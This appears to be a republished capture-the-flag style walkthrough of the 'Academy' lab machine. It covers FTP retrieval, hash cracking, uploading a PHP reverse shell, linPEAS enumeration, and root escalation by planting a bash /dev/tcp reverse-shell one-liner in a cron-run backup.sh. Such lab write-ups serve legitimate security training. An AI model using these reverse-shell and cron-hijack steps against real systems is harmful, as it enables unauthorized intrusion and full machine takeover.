Info@NationalCyberSecurity
Info@NationalCyberSecurity

Hacking Academy. Machine: Academy | by Rahul Ravishankar | Jan, 2024 | #hacking | #cybersecurity | #infosec | #comptia | #pentest | #hacker


We can use FTP to get the note.txt file but we don’t know where the file is located

We can then go ahead and check out what the note.txt file says

In the note.txt file, we see a database that contains a username and password, however, the password looks to be hashed

We can identify what type of hash it is by using a tool in Kali called “hash-identifier”

We can use “hashcat” to crack the hash or we can use an online hash cracker

We can look for directories on a web page using these 2 tools

From those results, we can see that there is a directory named “academy” that we can use the credentials that were given to us in the note.txt file

We can navigate through the academy and identify that we can upload a reverse shell in the following section of the website “http://192.168.244.133/academy/my-profile.php”

https://github.com/pentestmonkey/php-reverse-shell

Before we upload the code we need to set up a listener using the following command

nc -nvlp 1234

We can then upload the code that is stored in a file and gain a shell, but we are not an admin on the machine

This is where we need to use privilege escalation to get root access and we can use the help of “linPEAS” to look for any points of privilege escalation

https://github.com/carlospolop/PEASS-ng

We will first host a web server

Going back to our shell we will get the linpeas.sh folder and change permissions so we can execute it

From running “linpeas” we were able to identify 2 points of key information

Since we know that “grimmie” is a user on the machine we can try logging into the account since we have the password

We can see that there is a file named “backup.sh” which seems to be a cron job and we can identify and check if that process is running using the tool “pspy”

Since we know that the process is running every minute we will use it to our favor to open up a reverse shell by putting the “Bash One Liner” into the “backup.sh” file

Reverse Shell Cheat Sheet

bash -i >& /dev/tcp/192.168.244.128/8080 0>&1

We can open up a listener and wait for the process to execute since it is executing in root

——————————————————–


Click Here For The Original Story From This Source.

National Cyber Security

FREE
VIEW